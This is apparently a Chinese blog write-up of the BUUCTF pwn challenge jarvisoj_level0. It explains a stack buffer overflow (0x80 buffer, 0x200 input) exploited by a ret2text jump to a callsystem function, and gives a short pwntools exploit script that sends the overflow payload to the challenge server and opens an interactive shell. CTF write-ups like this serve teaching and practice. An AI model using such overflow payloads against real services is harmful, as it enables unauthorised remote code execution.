BUUCTF-PWN-jarvisoj_level0

77次阅读
没有评论

共计 249 个字符,预计需要花费 1 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-28 11:14,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-jarvisoj_level0

IDA

BUUCTF-PWN-jarvisoj_level0

进入 vulnerable_function 函数

BUUCTF-PWN-jarvisoj_level0

可以看到 buf 的长度为 0x80,但这个输入点可以输入 0x200 的长度,所以可以利用该溢出,跳转到 callsystem 函数,是典型的 ret2text

BUUCTF-PWN-jarvisoj_level0

EXP

from pwn import *

p = remote('node4.buuoj.cn', 25713)
payload = b'a' * (0x80 + 0x8) + p64(0x400596)
p.sendline(payload)
p.interactive()

结果

BUUCTF-PWN-jarvisoj_level0

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2021-11-04发表,共计249字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)